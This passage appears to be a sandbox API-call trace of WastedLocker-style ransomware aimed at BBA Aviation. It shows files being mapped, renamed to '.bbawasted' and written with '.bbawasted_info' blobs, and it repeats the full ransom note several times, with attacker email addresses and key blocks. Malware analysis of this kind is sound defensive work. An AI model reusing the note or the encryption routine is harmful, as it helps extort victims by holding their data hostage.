(lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0161.965] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0161.965] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x12f70 [0161.965] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f70) returned 0x630000 [0161.966] CloseHandle (hObject=0x28c) returned 1 [0162.098] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0162.098] CloseHandle (hObject=0x27c) returned 1 [0162.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.098] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0162.099] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.099] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.099] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0162.099] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0162.099] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.108] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]pbGeYFJ8OFo/inGYCQrBa8N1K9kySywnIOulMmVVgbxCdqhzKhH4fHb/y2URjEkR\r\nlsTY9yPrMFAagP+OcLAcYPbAFmGkzTIEV6yuzC6MKOL2wamhVBNyw58V5D4Bl6Qh\r\njDXg1kY6g8m1BAHkD2ft9pt8bBAhzEV3H1x0aEa9tJpWiJwDJRAf7bU6PF5O8zPI\r\nDHn7Zmdu7iQQJx07wgkPdcxcabFavSJ4SCPXXqTpJSowWZ/SfGSPO3eeSENV+sTP\r\n52XLibsjaRHMVV0eSiBuXhtgkLk6M364CRqidy4Q5k6PCEPsOTYaYN9Fz4M/9CLo\r\najgQ5SBtk5YDvAvGT5hhhvr5QNfzILpzEyYNbzcGzliq9FgLaQiVKJeMe8xZpmT0\r\nTsBjz6jSe7f3liZkQ5AcPZmJ7efGxN4pS1NeNrte0Ih2Bb+lWCtIWP9L7r6lUtSA\r\nEB9Q4Ap20z8OXqYWNOF874+6IwmlOE1JOrFVuicMpW/9mhguOBmJBDWLF5J2YPF/\r\n/J48ZV3FglSnmPear4NftZxtI1HGxvlblUD9izxRK+CSZDZ27ZnIgFMUpJtMdRv1\r\nHCdDgiwrbK50VwGIpavrfWEgaaxiTjkrOexRvdgzF3AQpYncHOInH55U71wSWhQ5\r\nOHs9hYZrmqAhhDJvB3WhFzk7DyhSBkO0/dSf/AFLENx=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.108] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0162.109] SetEndOfFile (hFile=0x280) returned 1 [0162.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.111] CloseHandle (hObject=0x280) returned 1 [0162.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0162.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1ef8 | out: hHeap=0x660000) returned 1 [0162.113] _aulldvrm () returned 0x0 [0162.113] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0162.113] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0162.113] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.113] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 39 [0162.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0162.113] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.113] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0162.114] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.114] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.114] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0162.116] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.117] SetEndOfFile (hFile=0x280) returned 1 [0162.117] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.117] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.bbawasted")) returned 1 [0162.122] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0162.122] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0162.123] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xf13 [0162.123] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf13) returned 0x630000 [0162.123] CloseHandle (hObject=0x27c) returned 1 [0162.186] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0162.186] CloseHandle (hObject=0x28c) returned 1 [0162.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.186] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef68) returned 1 [0162.187] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.187] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.187] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef68) returned 1 [0162.187] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0162.187] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.196] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CGZF2ZJ4GBEuPHN0+Z3+ruF2nvTjqDmzE0g4y0BEQY7Wf+XAZzIRpCsi8cwk2itB\r\n4IDckMQGTdTHmbXpCeNaL+zbSnAXcGjeQ8dI02AybmmI+ovUnAn2lrE4I13kChd6\r\nMUqL27WkYlF4RKkLhgRqBO9BLcQFA8Dc2dIzIu4E6pT8aomtcAc7YOM90B48icN+\r\nm58J9SbjbapxWGbBIA6a/6M4MyRSzOCim97SOsBgwBXgk5LhRZ3xW3MDa6My0zxe\r\nHwhL1oW07wZ+WARQP4WJ9cPSK3UQgfHGan0LWCC0N/t87KcNuVWpxhW0b/Gr/8BF\r\n9LKhy4mzrY2+vUx/q/uidTrfxOwF7PlltbOJKM1CaHnpR2x9yqQ+6PGjiSVR0Ah8\r\nTiBz9jr/s/iJbjXb7n/9Ie+bIQPtrQA9yUtbe3kiNrTCEvuC9c+R0p21PLmH/MrU\r\nsYZLMzDzfp4Ki8shpEjGGdjZcPJvT7H7BnwkN1OH1QwVxIn92o0lWHK2xsucdCor\r\nxnavohpi6I8JwaO9fl4g9BP145rWg4poeeKNhBR+w68PYlHUXwcG4ZLZBQbHMNKG\r\nl/rbTLZVkahu5kWbtDt0dYgdTri3tlFSPAfWHpkYsnhJae0Lhfl4wUgdXkxVujJv\r\nJ7jIdG2IVom7m39j/z1XHCf9NoVW82/k2U6ysEAj69g=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.196] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0162.196] SetEndOfFile (hFile=0x280) returned 1 [0162.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.198] CloseHandle (hObject=0x280) returned 1 [0162.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0162.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3458 | out: hHeap=0x660000) returned 1 [0162.200] _aulldvrm () returned 0x0 [0162.200] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0162.201] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0162.201] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.201] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 39 [0162.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0162.201] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.201] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0162.202] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.202] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.202] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0162.204] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.205] SetEndOfFile (hFile=0x280) returned 1 [0162.205] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.205] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.bbawasted")) returned 1 [0162.206] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0162.206] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0162.207] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16c3 [0162.207] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16c3) returned 0x630000 [0162.207] CloseHandle (hObject=0x28c) returned 1 [0162.260] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0162.260] CloseHandle (hObject=0x27c) returned 1 [0162.261] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.261] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0162.261] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.261] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.261] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0162.262] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0162.262] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0162.273] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]b7/LPUGyrmbvfzFKFh9aruJ9slJr5ibI1aWIEerPKVezKysbistG39U3r94BmgLR\r\nDCHm/+HnQK6z5R3pDxrYnpadoJLd1nS++70mBPtU76K50fd6yzbeFwrAIny4gMxj\r\nbOHQ4j9gFyiUzCjOvi/MahKEBQrBrcyY5DlhKa345+KIdRW/wzLOkomikFePDsWE\r\ngvirelpy1qbOVB9fjtdKfUpHRc9U67R2pCSumYtDLLGXWFE6QJuytDCis5lPPXoI\r\nfNXsSx+xUgN6kOYTaqNe4kiZrNDwwii2TI8GfK+NKIh2IWn2sG6SHcWXRujeQm/5\r\nUE2pxNNfPouRoUYJfkgv2K8XLTnuTQ1sCKuwQHtdYyGYv1Zh+nG0BsyxetXrIKnc\r\nkutqZlUdApXjlEIt466uxt2Qozqmpsf7JsDA42FbKSg7Hj29MWD8TOoCn3Pc025r\r\nAdV540BfUZzcdZ1gBx4V2LYN2SPZ7gyB0QO39e4WN4P0+B6DP27hoNQdqsMBB4fj\r\nyg5Rr3FVbGcF2oXiN07gTEanzPRlIhpkXLSjoQjwQIzh8dPyV0N0s6vbDriim0tB\r\nFDI/Ht9nm+5fKan60WMUo76Nk8rr9Aqm5UYY34BiF7/NHU1oQ52l9auzRRsd0r8O\r\ny4HpyTUxNNG3VlG4s5FoTR/7AcZd+MORp/C3z6QuH6A=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.273] WriteFile (in: hFile=0x280, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0162.273] SetEndOfFile (hFile=0x280) returned 1 [0162.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0162.276] CloseHandle (hObject=0x280) returned 1 [0162.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0162.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2930 | out: hHeap=0x660000) returned 1 [0162.396] _aulldvrm () returned 0x0 [0162.396] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0162.397] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0162.397] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.397] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 39 [0162.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0162.397] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.397] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0162.398] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.398] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.398] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0162.401] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.402] SetEndOfFile (hFile=0x280) returned 1 [0162.402] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.403] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.bbawasted")) returned 1 [0162.404] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0162.404] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0162.404] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x18a5 [0162.404] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18a5) returned 0x650000 [0162.404] CloseHandle (hObject=0x288) returned 1 [0162.407] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0162.407] CloseHandle (hObject=0x294) returned 1 [0162.407] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.407] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef68) returned 1 [0162.408] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.408] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.408] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef68) returned 1 [0162.409] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0162.409] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.418] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 